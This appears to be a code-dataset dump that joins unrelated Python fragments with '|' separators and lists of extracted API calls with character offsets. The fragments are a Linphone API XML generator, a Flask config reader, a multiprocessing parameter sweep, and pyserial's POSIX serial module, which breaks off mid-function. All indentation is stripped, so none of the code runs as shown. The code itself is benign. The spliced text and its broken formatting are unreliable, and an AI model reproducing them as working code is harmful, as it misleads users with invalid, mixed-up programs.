enumBriefDescriptionNode = ET.SubElement(enumNode, 'briefdescription')
enumBriefDescriptionNode.text = cenum.briefDescription
enumNode.append(cenum.detailedDescription)
if len(cenum.values) > 0:
enumValuesNode = ET.SubElement(enumNode, 'values')
for value in cenum.values:
enumValuesNodeAttributes = { 'name' : value.name, 'deprecated' : str(value.deprecated).lower() }
valueNode = ET.SubElement(enumValuesNode, 'value', enumValuesNodeAttributes)
if value.briefDescription != '':
valueBriefDescriptionNode = ET.SubElement(valueNode, 'briefdescription')
valueBriefDescriptionNode.text = value.briefDescription
valueNode.append(value.detailedDescription)
def __generateFunction(self, parentNode, nodeName, f):
functionAttributes = { 'name' : f.name, 'deprecated' : str(f.deprecated).lower() }
if f.location is not None:
functionAttributes['location'] = f.location
functionNode = ET.SubElement(parentNode, nodeName, functionAttributes)
returnValueAttributes = { 'type' : f.returnArgument.ctype, 'completetype' : f.returnArgument.completeType }
if f.returnArgument.containedType is not None:
returnValueAttributes['containedtype'] = f.returnArgument.containedType
returnValueNode = ET.SubElement(functionNode, 'return', returnValueAttributes)
if f.returnArgument.description is not None:
returnValueNode.append(f.returnArgument.description)
argumentsNode = ET.SubElement(functionNode, 'arguments')
for arg in f.arguments:
argumentNodeAttributes = { 'name' : arg.name, 'type' : arg.ctype, 'completetype' : arg.completeType }
if arg.containedType is not None:
argumentNodeAttributes['containedtype'] = arg.containedType
argumentNode = ET.SubElement(argumentsNode, 'argument', argumentNodeAttributes)
if arg.description is not None:
argumentNode.append(arg.description)
if f.briefDescription != '':
functionBriefDescriptionNode = ET.SubElement(functionNode, 'briefdescription')
functionBriefDescriptionNode.text = f.briefDescription
functionNode.append(f.detailedDescription)
def __generateClass(self, cclass, classesNode):
# Do not include classes that contain nothing
if len(cclass.events) == 0 and len(cclass.classMethods) == 0 and \
len(cclass.instanceMethods) == 0 and len(cclass.properties) == 0:
return
# Check the capabilities of the class
has_ref_method = False
has_unref_method = False
has_destroy_method = False
for methodname in cclass.instanceMethods:
methodname_without_prefix = methodname.replace(cclass.cFunctionPrefix, '')
if methodname_without_prefix == 'ref':
has_ref_method = True
elif methodname_without_prefix == 'unref':
has_unref_method = True
elif methodname_without_prefix == 'destroy':
has_destroy_method = True
refcountable = False
destroyable = False
if has_ref_method and has_unref_method:
refcountable = True
if has_destroy_method:
destroyable = True
classNodeAttributes = {
'name' : cclass.name,
'cfunctionprefix' : cclass.cFunctionPrefix,
'deprecated' : str(cclass.deprecated).lower(),
'refcountable' : str(refcountable).lower(),
'destroyable' : str(destroyable).lower()
}
# Generate the XML node for the class
classNode = ET.SubElement(classesNode, 'class', classNodeAttributes)
if len(cclass.events) > 0:
eventsNode = ET.SubElement(classNode, 'events')
eventnames = []
for eventname in cclass.events:
eventnames.append(eventname)
eventnames.sort()
for eventname in eventnames:
self.__generateFunction(eventsNode, 'event', cclass.events[eventname])
if len(cclass.classMethods) > 0:
classMethodsNode = ET.SubElement(classNode, 'classmethods')
methodnames = []
for methodname in cclass.classMethods:
methodnames.append(methodname)
methodnames.sort()
for methodname in methodnames:
self.__generateFunction(classMethodsNode, 'classmethod', cclass.classMethods[methodname])
if len(cclass.instanceMethods) > 0:
instanceMethodsNode = ET.SubElement(classNode, 'instancemethods')
methodnames = []
for methodname in cclass.instanceMethods:
methodnames.append(methodname)
methodnames.sort()
for methodname in methodnames:
self.__generateFunction(instanceMethodsNode, 'instancemethod', cclass.instanceMethods[methodname])
if len(cclass.properties) > 0:
propertiesNode = ET.SubElement(classNode, 'properties')
propnames = []
for propname in cclass.properties:
propnames.append(propname)
propnames.sort()
for propname in propnames:
propertyNodeAttributes = { 'name' : propname }
propertyNode = ET.SubElement(propertiesNode, 'property', propertyNodeAttributes)
if cclass.properties[propname].getter is not None:
self.__generateFunction(propertyNode, 'getter', cclass.properties[propname].getter)
if cclass.properties[propname].setter is not None:
self.__generateFunction(propertyNode, 'setter', cclass.properties[propname].setter)
if cclass.briefDescription != '':
classBriefDescriptionNode = ET.SubElement(classNode, 'briefdescription')
classBriefDescriptionNode.text = cclass.briefDescription
classNode.append(cclass.detailedDescription)
def generate(self, project):
print("Generating XML document of Linphone API to '" + self.__outputfile.name + "'")
apiNode = ET.Element('api')
project.enums.sort(key = lambda e: e.name)
if len(project.enums) > 0:
enumsNode = ET.SubElement(apiNode, 'enums')
for cenum in project.enums:
self.__generateEnum(cenum, enumsNode)
if len(project.classes) > 0:
classesNode = ET.SubElement(apiNode, 'classes')
project.classes.sort(key = lambda c: c.name)
for cclass in project.classes:
self.__generateClass(cclass, classesNode)
s = '<?xml version="1.0" encoding="UTF-8" ?>\n'.encode('utf-8')
s += ET.tostring(apiNode, 'utf-8')
if project.prettyPrint:
s = minidom.parseString(s).toprettyxml(indent='\t')
self.__outputfile.write(s)
def main(argv = None):
if argv is None:
argv = sys.argv
argparser = argparse.ArgumentParser(description="Generate XML version of the Linphone API.")
argparser.add_argument('-o', '--outputfile', metavar='outputfile', type=argparse.FileType('w'), help="Output XML file describing the Linphone API.")
argparser.add_argument('--verbose', help="Increase output verbosity", action='store_true')
argparser.add_argument('--pretty', help="XML pretty print", action='store_true')
argparser.add_argument('xmldir', help="XML directory generated by doxygen.")
args = argparser.parse_args()
if args.outputfile == None:
args.outputfile = open('api.xml', 'w')
project = Project()
if args.verbose:
project.verbose = True
if args.pretty:
project.prettyPrint = True
project.initFromDir(args.xmldir)
project.check()
gen = Generator(args.outputfile)
gen.generate(project)
if __name__ == "__main__":
sys.exit(main())
| [
"argparse.FileType",
"os.listdir",
"xml.etree.ElementTree.parse",
"argparse.ArgumentParser",
"metadoc.Parser",
"xml.etree.ElementTree.tostring",
"os.path.join",
"xml.etree.ElementTree.Element",
"xml.dom.minidom.parseString",
"xml.etree.ElementTree.SubElement",
"six.iteritems"
] | [((27754, 27839), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Generate XML version of the Linphone API."""'}), "(description='Generate XML version of the Linphone API.'\n )\n", (27777, 27839), False, 'import argparse\n'), ((6873, 6889), 'metadoc.Parser', 'metadoc.Parser', ([], {}), '()\n', (6887, 6889), False, 'import metadoc\n'), ((21658, 21710), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumsNode', '"""enum"""', 'enumNodeAttributes'], {}), "(enumsNode, 'enum', enumNodeAttributes)\n", (21671, 21710), True, 'import xml.etree.ElementTree as ET\n'), ((22676, 22731), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['parentNode', 'nodeName', 'functionAttributes'], {}), '(parentNode, nodeName, functionAttributes)\n', (22689, 22731), True, 'import xml.etree.ElementTree as ET\n'), ((22986, 23046), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '"""return"""', 'returnValueAttributes'], {}), "(functionNode, 'return', returnValueAttributes)\n", (22999, 23046), True, 'import xml.etree.ElementTree as ET\n'), ((23168, 23208), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '"""arguments"""'], {}), "(functionNode, 'arguments')\n", (23181, 23208), True, 'import xml.etree.ElementTree as ET\n'), ((24979, 25035), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classesNode', '"""class"""', 'classNodeAttributes'], {}), "(classesNode, 'class', classNodeAttributes)\n", (24992, 25035), True, 'import xml.etree.ElementTree as ET\n'), ((27044, 27061), 'xml.etree.ElementTree.Element', 'ET.Element', (['"""api"""'], {}), "('api')\n", (27054, 27061), True, 'import xml.etree.ElementTree as ET\n'), ((27539, 27568), 'xml.etree.ElementTree.tostring', 'ET.tostring', (['apiNode', '"""utf-8"""'], {}), "(apiNode, 'utf-8')\n", (27550, 27568), True, 'import xml.etree.ElementTree as ET\n'), ((20936, 20959), 'os.path.join', 'os.path.join', (['xmldir', 'f'], {}), '(xmldir, f)\n', (20948, 20959), False, 'import os\n'), ((21148, 21175), 'six.iteritems', 'six.iteritems', (['c.properties'], {}), '(c.properties)\n', (21161, 21175), False, 'import six\n'), ((21776, 21819), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumNode', '"""briefdescription"""'], {}), "(enumNode, 'briefdescription')\n", (21789, 21819), True, 'import xml.etree.ElementTree as ET\n'), ((21971, 22004), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumNode', '"""values"""'], {}), "(enumNode, 'values')\n", (21984, 22004), True, 'import xml.etree.ElementTree as ET\n'), ((23459, 23523), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['argumentsNode', '"""argument"""', 'argumentNodeAttributes'], {}), "(argumentsNode, 'argument', argumentNodeAttributes)\n", (23472, 23523), True, 'import xml.etree.ElementTree as ET\n'), ((23665, 23712), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '"""briefdescription"""'], {}), "(functionNode, 'briefdescription')\n", (23678, 23712), True, 'import xml.etree.ElementTree as ET\n'), ((25081, 25115), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""events"""'], {}), "(classNode, 'events')\n", (25094, 25115), True, 'import xml.etree.ElementTree as ET\n'), ((25388, 25428), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""classmethods"""'], {}), "(classNode, 'classmethods')\n", (25401, 25428), True, 'import xml.etree.ElementTree as ET\n'), ((25739, 25782), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', 
'"""instancemethods"""'], {}), "(classNode, 'instancemethods')\n", (25752, 25782), True, 'import xml.etree.ElementTree as ET\n'), ((26095, 26133), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""properties"""'], {}), "(classNode, 'properties')\n", (26108, 26133), True, 'import xml.etree.ElementTree as ET\n'), ((26762, 26806), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""briefdescription"""'], {}), "(classNode, 'briefdescription')\n", (26775, 26806), True, 'import xml.etree.ElementTree as ET\n'), ((27151, 27182), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['apiNode', '"""enums"""'], {}), "(apiNode, 'enums')\n", (27164, 27182), True, 'import xml.etree.ElementTree as ET\n'), ((27304, 27337), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['apiNode', '"""classes"""'], {}), "(apiNode, 'classes')\n", (27317, 27337), True, 'import xml.etree.ElementTree as ET\n'), ((27908, 27930), 'argparse.FileType', 'argparse.FileType', (['"""w"""'], {}), "('w')\n", (27925, 27930), False, 'import argparse\n'), ((20565, 20576), 'xml.etree.ElementTree.parse', 'ET.parse', (['f'], {}), '(f)\n', (20573, 20576), True, 'import xml.etree.ElementTree as ET\n'), ((20969, 20987), 'os.listdir', 'os.listdir', (['xmldir'], {}), '(xmldir)\n', (20979, 20987), False, 'import os\n'), ((22152, 22216), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumValuesNode', '"""value"""', 'enumValuesNodeAttributes'], {}), "(enumValuesNode, 'value', enumValuesNodeAttributes)\n", (22165, 22216), True, 'import xml.etree.ElementTree as ET\n'), ((26341, 26406), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['propertiesNode', '"""property"""', 'propertyNodeAttributes'], {}), "(propertiesNode, 'property', propertyNodeAttributes)\n", (26354, 26406), True, 'import xml.etree.ElementTree as ET\n'), ((22287, 22331), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['valueNode', '"""briefdescription"""'], {}), "(valueNode, 'briefdescription')\n", (22300, 22331), True, 'import xml.etree.ElementTree as ET\n'), ((27602, 27624), 'xml.dom.minidom.parseString', 'minidom.parseString', (['s'], {}), '(s)\n', (27621, 27624), True, 'import xml.dom.minidom as minidom\n'), ((21007, 21030), 'os.path.join', 'os.path.join', (['xmldir', 'f'], {}), '(xmldir, f)\n', (21019, 21030), False, 'import os\n')] |
import configparser
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
dir_path += '/cfg.ini'
class Configuration(object):
def __init__(self,debug=False):
section = "Flask-debug" if debug else "Flask"
cfg = configparser.ConfigParser()
cfg.read(dir_path if debug else "/var/www/html/flaskApp/cfg.ini")
self.debug = cfg.getboolean(section, "DEBUG")
self.csrf_enabled = cfg.getboolean(section,"CSRF_ENABLED")
self.threads_per_page = cfg.getint(section,"THREADS_PER_PAGE")
self.port = cfg.getint(section,"PORT")
self.host = cfg.get(section,"HOST")
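
# Illustrative usage sketch (not part of the original module): "app" is an
# assumed Flask application instance consuming the parsed settings.
def run_app(app, debug=False):
    config = Configuration(debug=debug)
    app.config['CSRF_ENABLED'] = config.csrf_enabled
    app.run(host=config.host, port=config.port, debug=config.debug)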
| [
"os.path.realpath",
"configparser.ConfigParser"
] | [((62, 88), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (78, 88), False, 'import os\n'), ((256, 283), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (281, 283), False, 'import configparser\n')] |
from multiprocessing import Pool
import EnvEq as ee
import numpy as np
import itertools as it
import os
#parsing input into numpy arrays
from input import *
y0=np.array([y0_Tpos,y0_Tpro,y0_Tneg,y0_o2,y0_test])
p=np.array([p_o2,p_test])
mu=np.array([[mu_o2Tpos,mu_o2Tpro,mu_o2Tneg],[mu_testTpos,mu_testTpro,0]])
lam=np.array([lam_o2,lam_test])
t_D=np.array([t_DTpos,t_DTpro,t_DTneg])
r=np.array([r_Tpos,r_Tpro,r_Tneg])
delta=np.array([delta_Tpos,delta_Tpro,delta_Tneg])
rho=np.array([rho_Tpos,rho_Tpro,rho_Tneg])
lim=np.array([[[l_lim_o2Tpos,u_lim_o2Tpos],[l_lim_o2Tpro,u_lim_o2Tpro],[l_lim_o2Tneg,u_lim_o2Tneg]],[[l_lim_testTpos,u_lim_testTpos],[l_lim_testTpro,u_lim_testTpro],[0,0]]],dtype=np.float64)
#make directories for saving raw_outputs
try:
os.makedirs("../../raw_output/EnvEq/"+f_name)
except:
pass
#iterator over these
o2_lim_arr=np.empty([0,2])
for ulim_Tpro in np.arange(0.1,1,0.2):
for ulim_Tneg in np.arange(0.1,1,0.2):
o2_lim_arr=np.append(o2_lim_arr,[[ulim_Tpro,ulim_Tneg]],axis=0)
def solve_parm(u_lim_o2): #calls the solve_eq function with all default inputs other than o2_lim
f_name_i=f_name+"{:.1f}".format(u_lim_o2[0])+"-"+"{:.1f}".format(u_lim_o2[1])
lim[0,1,1]=u_lim_o2[0]
lim[0,2,1]=u_lim_o2[1]
ee.solve_eq(t_max,dt,y0,p,mu,lam,r,K,delta,rho,lim,f_name_i)
if __name__ == '__main__':
pool = Pool(4)
pool.map(solve_parm,o2_lim_arr) #iterate over the o2_lims
pool.close()
pool.join()
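    # Note (added for illustration): each np.arange(0.1, 1, 0.2) sweep yields the
    # values 0.1, 0.3, 0.5, 0.7, 0.9, so o2_lim_arr holds 5 x 5 = 25 parameter
    # pairs and solve_parm runs once per pair across the 4 worker processes.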
| [
"EnvEq.solve_eq",
"os.makedirs",
"numpy.append",
"numpy.array",
"numpy.empty",
"multiprocessing.Pool",
"numpy.arange"
] | [((161, 214), 'numpy.array', 'np.array', (['[y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test]'], {}), '([y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test])\n', (169, 214), True, 'import numpy as np\n'), ((213, 237), 'numpy.array', 'np.array', (['[p_o2, p_test]'], {}), '([p_o2, p_test])\n', (221, 237), True, 'import numpy as np\n'), ((240, 316), 'numpy.array', 'np.array', (['[[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]]'], {}), '([[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]])\n', (248, 316), True, 'import numpy as np\n'), ((316, 344), 'numpy.array', 'np.array', (['[lam_o2, lam_test]'], {}), '([lam_o2, lam_test])\n', (324, 344), True, 'import numpy as np\n'), ((348, 385), 'numpy.array', 'np.array', (['[t_DTpos, t_DTpro, t_DTneg]'], {}), '([t_DTpos, t_DTpro, t_DTneg])\n', (356, 385), True, 'import numpy as np\n'), ((386, 420), 'numpy.array', 'np.array', (['[r_Tpos, r_Tpro, r_Tneg]'], {}), '([r_Tpos, r_Tpro, r_Tneg])\n', (394, 420), True, 'import numpy as np\n'), ((425, 471), 'numpy.array', 'np.array', (['[delta_Tpos, delta_Tpro, delta_Tneg]'], {}), '([delta_Tpos, delta_Tpro, delta_Tneg])\n', (433, 471), True, 'import numpy as np\n'), ((474, 514), 'numpy.array', 'np.array', (['[rho_Tpos, rho_Tpro, rho_Tneg]'], {}), '([rho_Tpos, rho_Tpro, rho_Tneg])\n', (482, 514), True, 'import numpy as np\n'), ((517, 725), 'numpy.array', 'np.array', (['[[[l_lim_o2Tpos, u_lim_o2Tpos], [l_lim_o2Tpro, u_lim_o2Tpro], [l_lim_o2Tneg,\n u_lim_o2Tneg]], [[l_lim_testTpos, u_lim_testTpos], [l_lim_testTpro,\n u_lim_testTpro], [0, 0]]]'], {'dtype': 'np.float64'}), '([[[l_lim_o2Tpos, u_lim_o2Tpos], [l_lim_o2Tpro, u_lim_o2Tpro], [\n l_lim_o2Tneg, u_lim_o2Tneg]], [[l_lim_testTpos, u_lim_testTpos], [\n l_lim_testTpro, u_lim_testTpro], [0, 0]]], dtype=np.float64)\n', (525, 725), True, 'import numpy as np\n'), ((852, 868), 'numpy.empty', 'np.empty', (['[0, 2]'], {}), '([0, 2])\n', (860, 868), True, 'import numpy as np\n'), ((885, 907), 'numpy.arange', 'np.arange', (['(0.1)', '(1)', '(0.2)'], {}), '(0.1, 1, 0.2)\n', (894, 907), True, 'import numpy as np\n'), ((755, 802), 'os.makedirs', 'os.makedirs', (["('../../raw_output/EnvEq/' + f_name)"], {}), "('../../raw_output/EnvEq/' + f_name)\n", (766, 802), False, 'import os\n'), ((928, 950), 'numpy.arange', 'np.arange', (['(0.1)', '(1)', '(0.2)'], {}), '(0.1, 1, 0.2)\n', (937, 950), True, 'import numpy as np\n'), ((1261, 1332), 'EnvEq.solve_eq', 'ee.solve_eq', (['t_max', 'dt', 'y0', 'p', 'mu', 'lam', 'r', 'K', 'delta', 'rho', 'lim', 'f_name_i'], {}), '(t_max, dt, y0, p, mu, lam, r, K, delta, rho, lim, f_name_i)\n', (1272, 1332), True, 'import EnvEq as ee\n'), ((1361, 1368), 'multiprocessing.Pool', 'Pool', (['(4)'], {}), '(4)\n', (1365, 1368), False, 'from multiprocessing import Pool\n'), ((969, 1024), 'numpy.append', 'np.append', (['o2_lim_arr', '[[ulim_Tpro, ulim_Tneg]]'], {'axis': '(0)'}), '(o2_lim_arr, [[ulim_Tpro, ulim_Tneg]], axis=0)\n', (978, 1024), True, 'import numpy as np\n')] |
#!/usr/bin/env python
#
# Python Serial Port Extension for Win32, Linux, BSD, Jython
# module for serial IO for POSIX compatible systems, like Linux
# see __init__.py
#
# (C) 2001-2010 <NAME> <<EMAIL>>
# this is distributed under a free software license, see license.txt
#
# parts based on code from <NAME> <<EMAIL>>:
# ftp://ftp.visi.com/users/grante/python/PosixSerial.py
#
# references: http://www.easysw.com/~mike/serial/serial.html
import sys, os, fcntl, termios, struct, select, errno, time
from .serialutil import *
# Do check the Python version as some constants have moved.
if (sys.hexversion < 0x020100f0):
import TERMIOS
else:
TERMIOS = termios
if (sys.hexversion < 0x020200f0):
import FCNTL
else:
FCNTL = fcntl
# try to detect the OS so that a device can be selected...
# this code block should supply a device() and set_special_baudrate() function
# for the platform
plat = sys.platform.lower()
if plat[:5] == 'linux': # Linux (confirmed)
def device(port):
return '/dev/ttyS%d' % port
ASYNC_SPD_MASK = 0x1030
ASYNC_SPD_CUST = 0x0030
def set_special_baudrate(port, baudrate):
import array
buf = array.array('i', [0] * 32)
# get serial_struct
FCNTL.ioctl(port.fd, TERMIOS.TIOCGSERIAL, buf)
# set custom divisor
        buf[6] = buf[7] // baudrate  # integer division: array('i') entries must be ints
# update flags
buf[4] &= ~ASYNC_SPD_MASK
buf[4] |= ASYNC_SPD_CUST
# set serial_struct
try:
res = FCNTL.ioctl(port.fd, TERMIOS.TIOCSSERIAL, buf)
except IOError:
raise ValueError('Failed to set custom baud rate: %r' % baudrate)
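    # Worked example (added for illustration): buf[7] holds the driver's baud_base,
    # so with a base of 115200 a request for 38400 baud stores custom divisor 3.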
baudrate_constants = {
0: 0000000, # hang up
50: 0o000001,
75: 0o000002,
110: 0o000003,
134: 0o000004,
150: 0o000005,
200: 0o000006,
300: 0o000007,
600: 0o000010,
1200: 0o000011,
1800: 0o000012,
2400: 0o000013,
4800: 0o000014,
9600: 0o000015,
19200: 0o000016,
38400: 0o000017,
57600: 0o010001,
115200: 0o010002,
230400: 0o010003,
460800: 0o010004,
500000: 0o010005,
576000: 0o010006,
921600: 0o010007,
1000000: 0o010010,
1152000: 0o010011,
1500000: 0o010012,
2000000: 0o010013,
2500000: 0o010014,
3000000: 0o010015,
3500000: 0o010016,
4000000: 0o010017
}
elif plat == 'cygwin': # cygwin/win32 (confirmed)
def device(port):
return '/dev/com%d' % (port + 1)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat == 'openbsd3': # BSD (confirmed)
def device(port):
return '/dev/ttyp%d' % port
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:3] == 'bsd' or \
plat[:7] == 'freebsd' or \
plat[:7] == 'openbsd': # BSD (confirmed for freebsd4: cuaa%d)
def device(port):
return '/dev/cuad%d' % port
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:6] == 'darwin': # OS X
version = os.uname()[2].split('.')
# Tiger or above can support arbitrary serial speeds
if int(version[0]) >= 8:
def set_special_baudrate(port, baudrate):
# use IOKit-specific call to set up high speeds
import array, fcntl
buf = array.array('i', [baudrate])
IOSSIOSPEED = 0x80045402 #_IOW('T', 2, speed_t)
fcntl.ioctl(port.fd, IOSSIOSPEED, buf, 1)
else: # version < 8
def set_special_baudrate(port, baudrate):
raise ValueError("baud rate not supported")
def device(port):
return '/dev/cuad%d' % port
baudrate_constants = {}
elif plat[:6] == 'netbsd': # NetBSD 1.6 testing by Erk
def device(port):
return '/dev/dty%02d' % port
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:4] == 'irix': # IRIX (partially tested)
def device(port):
return '/dev/ttyf%d' % (port+1) #XXX different device names depending on flow control
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:2] == 'hp': # HP-UX (not tested)
def device(port):
return '/dev/tty%dp0' % (port+1)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:5] == 'sunos': # Solaris/SunOS (confirmed)
def device(port):
return '/dev/tty%c' % (ord('a')+port)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:3] == 'aix': # AIX
def device(port):
return '/dev/tty%d' % (port)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
else:
# platform detection has failed...
sys.stderr.write("""\
don't know how to number ttys on this system.
! Use an explicit path (eg /dev/ttyS1) or send this information to
! the author of this module:
sys.platform = %r
os.name = %r
serialposix.py version = %s
also add the device name of the serial port and where the
counting starts for the first serial port.
e.g. 'first serial port: /dev/ttyS0'
and with a bit luck you can get this module running...
""" % (sys.platform, os.name, VERSION))
# no exception, just continue with a brave attempt to build a device name
# even if the device name is not correct for the platform it has chances
# to work using a string with the real device name as port parameter.
    def device(portnum):
return '/dev/ttyS%d' % portnum
def set_special_baudrate(port, baudrate):
raise SerialException("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
#~ raise Exception, "this module does not run on this platform, sorry."
# whats up with "aix", "beos", ....
# they should work, just need to know the device names.
# load some constants for later use.
# try to use values from TERMIOS, use defaults from linux otherwise
TIOCMGET = hasattr(TERMIOS, 'TIOCMGET') and TERMIOS.TIOCMGET or 0x5415
TIOCMBIS = hasattr(TERMIOS, 'TIOCMBIS') and TERMIOS.TIOCMBIS or 0x5416
TIOCMBIC = hasattr(TERMIOS, 'TIOCMBIC') and TERMIOS.TIOCMBIC or 0x5417
TIOCMSET = hasattr(TERMIOS, 'TIOCMSET') and TERMIOS.TIOCMSET or 0x5418
#TIOCM_LE = hasattr(TERMIOS, 'TIOCM_LE') and TERMIOS.TIOCM_LE or 0x001
TIOCM_DTR = hasattr(TERMIOS, 'TIOCM_DTR') and TERMIOS.TIOCM_DTR or 0x002
TIOCM_RTS = hasattr(TERMIOS, 'TIOCM_RTS') and TERMIOS.TIOCM_RTS or 0x004
#TIOCM_ST = hasattr(TERMIOS, 'TIOCM_ST') and TERMIOS.TIOCM_ST or 0x008
#TIOCM_SR = hasattr(TERMIOS, 'TIOCM_SR') and TERMIOS.TIOCM_SR or 0x010
TIOCM_CTS = hasattr(TERMIOS, 'TIOCM_CTS') and TERMIOS.TIOCM_CTS or 0x020
TIOCM_CAR = hasattr(TERMIOS, 'TIOCM_CAR') and TERMIOS.TIOCM_CAR or 0x040
TIOCM_RNG = hasattr(TERMIOS, 'TIOCM_RNG') and TERMIOS.TIOCM_RNG or 0x080
TIOCM_DSR = hasattr(TERMIOS, 'TIOCM_DSR') and TERMIOS.TIOCM_DSR or 0x100
TIOCM_CD = hasattr(TERMIOS, 'TIOCM_CD') and TERMIOS.TIOCM_CD or TIOCM_CAR
TIOCM_RI = hasattr(TERMIOS, 'TIOCM_RI') and TERMIOS.TIOCM_RI or TIOCM_RNG
#TIOCM_OUT1 = hasattr(TERMIOS, 'TIOCM_OUT1') and TERMIOS.TIOCM_OUT1 or 0x2000
#TIOCM_OUT2 = hasattr(TERMIOS, 'TIOCM_OUT2') and TERMIOS.TIOCM_OUT2 or 0x4000
TIOCINQ = hasattr(TERMIOS, 'FIONREAD') and TERMIOS.FIONREAD or 0x541B
TIOCM_zero_str = struct.pack('I', 0)
TIOCM_RTS_str = struct.pack('I', TIOCM_RTS)
TIOCM_DTR_str = struct.pack('I', TIOCM_DTR)
TIOCSBRK = hasattr(TERMIOS, 'TIOCSBRK') and TERMIOS.TIOCSBRK or 0x5427
TIOCCBRK = hasattr(TERMIOS, 'TIOCCBRK') and TERMIOS.TIOCCBRK or 0x5428
class PosixSerial(SerialBase):
"""Serial port class POSIX implementation. Serial port configuration is
done with termios and fcntl. Runs on Linux and many other Un*x like
systems."""
def open(self):
"""Open port with current settings. This may throw a SerialException
if the port cannot be opened."""
self.fd = None
if self._port is None:
raise SerialException("Port must be configured before it can be used.")
# open
try:
self.fd = os.open(self.portstr, os.O_RDWR|os.O_NOCTTY|os.O_NONBLOCK)
except Exception as msg:
self.fd = None
raise SerialException("could not open port %s: %s" % (self._port, msg))
#~ fcntl.fcntl(self.fd, FCNTL.F_SETFL, 0) # set blocking
try:
self._reconfigurePort()
except:
try:
os.close(self.fd)
except:
# ignore any exception when closing the port
# also to keep original exception that happened when setting up
pass
self.fd = None
raise
else:
self._isOpen = True
#~ self.flushInput()
def _reconfigurePort(self):
"""Set communication parameters on opened port."""
if self.fd is None:
raise SerialException("Can only operate on a valid file descriptor")
custom_baud = None
vmin = vtime = 0 # timeout is done via select
if self._interCharTimeout is not None:
vmin = 1
vtime = int(self._interCharTimeout * 10)
try:
iflag, oflag, cflag, lflag, ispeed, ospeed, cc = termios.tcgetattr(self.fd)
except termios.error as msg: # if a port is nonexistent but has a /dev file, it'll fail here
raise SerialException("Could not configure port: %s" % msg)
# set up raw mode / no echo / binary
cflag |= (TERMIOS.CLOCAL|TERMIOS.CREAD)
lflag &= ~(TERMIOS.ICANON|TERMIOS.ECHO|TERMIOS.ECHOE|TERMIOS.ECHOK|TERMIOS.ECHONL|
TERMIOS.ISIG|TERMIOS.IEXTEN) #|TERMIOS.ECHOPRT
for flag in ('ECHOCTL', 'ECHOKE'): # netbsd workaround for Erk
if hasattr(TERMIOS, flag):
lflag &= ~getattr(TERMIOS, flag)
oflag &= ~(TERMIOS.OPOST)
iflag &= ~(TERMIOS.INLCR|TERMIOS.IGNCR|TERMIOS.ICRNL|TERMIOS.IGNBRK)
if hasattr(TERMIOS, 'IUCLC'):
iflag &= ~TERMIOS.IUCLC
if hasattr(TERMIOS, 'PARMRK'):
iflag &= ~TERMIOS.PARMRK
# setup baud rate
try:
ispeed = ospeed = getattr(TERMIOS, 'B%s' % (self._baudrate))
except AttributeError:
try:
ispeed = ospeed = baudrate_constants[self._baudrate]
except KeyError:
#~ raise ValueError('Invalid baud rate: %r' % self._baudrate)
# may need custom baud rate, it isn't in our list.
ispeed = ospeed = getattr(TERMIOS, 'B38400')
try:
custom_baud = int(self._baudrate) # store for later
except ValueError:
raise ValueError('Invalid baud rate: %r' % self._baudrate)
else:
if custom_baud < 0:
raise ValueError('Invalid baud rate: %r' % self._baudrate)
# setup char len
cflag &= ~TERMIOS.CSIZE
if self._bytesize == 8:
cflag |= TERMIOS.CS8
elif self._bytesize == 7:
cflag |= TERMIOS.CS7
elif self._bytesize == 6:
cflag |= TERMIOS.CS6
elif self._bytesize == 5:
cflag |= TERMIOS.CS5
else:
raise ValueError('Invalid char len: %r' % self._bytesize)
# setup stopbits
if self._stopbits == STOPBITS_ONE:
cflag &= ~(TERMIOS.CSTOPB)
elif self._stopbits == STOPBITS_ONE_POINT_FIVE:
cflag |= (TERMIOS.CSTOPB) # XXX same as TWO.. there is no POSIX support for 1.5
elif self._stopbits == STOPBITS_TWO:
